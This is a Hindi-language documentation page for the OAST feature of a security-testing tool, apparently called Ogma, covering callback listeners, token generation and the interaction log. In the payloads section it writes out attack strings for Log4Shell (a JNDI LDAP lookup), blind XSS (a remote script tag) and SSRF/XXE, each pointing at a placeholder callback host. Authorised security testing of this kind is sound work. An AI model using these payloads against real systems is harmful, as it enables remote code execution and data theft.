OAST
OAST (आउट-ऑफ़-बैंड एप्लिकेशन सुरक्षा परीक्षण) उन कमजोरियों का पता लगाता है जिनसे कोई दिखाई देने वाली प्रतिक्रिया नहीं मिलती; इसके बजाय लक्ष्य आपके नियंत्रण वाले लिसनर तक आउटबाउंड कनेक्शन बनाता है, जिससे समस्या की पुष्टि होती है।
यह कैसे काम करता है
Ogma कई प्रोटोकॉल पर स्थानीय लिसनर चलाता है। जब लक्ष्य एप्लिकेशन इनमें से किसी लिसनर से संपर्क करता है, तो उस इंटरैक्शन के साथ स्रोत IP, टाइमस्टैम्प, प्राप्त डेटा और इंजेक्ट किया गया टोकन दर्ज होता है।
लिसनर के प्रोटोकॉल
| प्रोटोकॉल | डिफ़ॉल्ट पोर्ट | उपयोग |
|---|---|---|
| HTTP | कॉन्फ़िगर किया जा सकता है | SSRF, ब्लाइंड XSS, वेबहुक |
| HTTPS | कॉन्फ़िगर किया जा सकता है | TLS पर SSRF |
| DNS | कॉन्फ़िगर किया जा सकता है | ब्लाइंड इंजेक्शन, XXE, log4shell |
| SMTP | कॉन्फ़िगर किया जा सकता है | ईमेल हेडर इंजेक्शन, मेल सेवाओं पर SSRF |
OAST सेटिंग्स पैनल में लिसनर पोर्ट और बनाए गए टोकन में उपयोग होने वाला डोमेन नाम कॉन्फ़िगर करें।
कॉलबैक टोकन बनाना
- उपयोगी उपकरण > OAST खोलें।
- टोकन बनाएँ पर क्लिक करें। प्रत्येक टोकन अपने परीक्षण के लिए अद्वितीय होता है।
- टोकन कॉपी करें। इसमें आपके लिसनर का डोमेन और एक अद्वितीय पहचानकर्ता होता है, ताकि इंटरैक्शन को संबंधित परीक्षण से जोड़ा जा सके।
टोकन प्रारूप का उदाहरण: [unique-id].[your-oast-domain]
पेलोड में टोकन उपयोग करना
कॉलबैक टोकन ऐसे किसी भी फ़ील्ड में इंजेक्ट करें जहाँ एप्लिकेशन बाहर जाने वाला कनेक्शन बना सकता है:
- SSRF: HTTP/HTTPS टोकन को लक्ष्य URL के रूप में उपयोग करें:
https://[token]/ - XXE: DOCTYPE या किसी बाहरी एंटिटी के URL में टोकन का संदर्भ दें।
- Log4Shell: किसी हेडर में शामिल करें:
${jndi:ldap://[token]/a} - ब्लाइंड XSS: स्क्रिप्ट के src के रूप में इंजेक्ट करें:
<script src="https://[token]/x.js"></script> - SMTP इंजेक्शन: ईमेल हेडर में गंतव्य पते या URL के रूप में उपयोग करें।
इंटरैक्शन लॉग
इंटरैक्शन पैनल प्रत्येक प्राप्त कॉलबैक दिखाता है:
| कॉलम | विवरण |
|---|---|
| समय | इंटरैक्शन प्राप्त होने का समय |
| प्रोटोकॉल | HTTP, HTTPS, DNS या SMTP |
| स्रोत IP | कनेक्शन बनाने वाला IP पता |
| टोकन | जिस टोकन से संपर्क किया गया |
| डेटा | अनुरोध पथ, DNS क्वेरी का नाम या SMTP डेटा |
किसी पंक्ति पर क्लिक करके इंटरैक्शन का पूरा विवरण देखें, जिसमें जहाँ लागू हो वहाँ अनुरोध हेडर और बॉडी भी शामिल हैं।
इंटरैक्शन को परीक्षणों से मिलाना
हर टोकन अद्वितीय होने के कारण आप अलग-अलग पैरामीटर या अनुरोधों में अलग टोकन इंजेक्ट कर सकते हैं और सटीक रूप से पता लगा सकते हैं कि किस इंजेक्शन बिंदु से कॉलबैक शुरू हुआ।